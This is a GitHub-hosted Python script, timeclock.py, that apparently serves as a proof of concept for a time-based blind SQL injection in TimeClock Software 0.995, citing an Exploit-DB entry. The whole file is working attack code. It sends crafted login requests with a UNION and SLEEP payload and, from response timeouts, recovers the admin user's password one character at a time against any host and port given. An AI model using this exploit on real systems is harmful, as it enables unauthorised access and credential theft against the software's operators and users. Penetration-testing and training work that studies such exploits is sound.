-
Notifications
You must be signed in to change notification settings - Fork 19
Expand file tree
/
Copy pathtimeclock.py
More file actions
33 lines (27 loc) · 927 Bytes
/
timeclock.py
File metadata and controls
33 lines (27 loc) · 927 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#!/usr/bin/env python
#
# Time-based blind SQL injection for TimeClock Sofware
# Based on TimeClock Software 0.995 - Multiple SQL Injections
# https://www.exploit-db.com/exploits/39404/
#
# Usage: timeclock.py <Host> <Port>
#
import requests, string, sys
query = "' union SELECT * from user_info WHERE username = 'admin' and substr(password, %d, 1) = binary '%s' and sleep(2) -- "
chars = string.ascii_letters + '0123456789'
host = sys.argv[1]
port = sys.argv[2]
print("Running!")
for i in range(1, 100):
found = False
for c in chars:
try:
requests.post("http://" + host + ":" + port + "/index.php",data={"username": query % (i, c), "password": "pass", "submit": "Log In"}, timeout=1)
except requests.exceptions.Timeout:
sys.stdout.write(c)
sys.stdout.flush()
found = True
break
if not found:
break
print("\nDone! Try Harder!")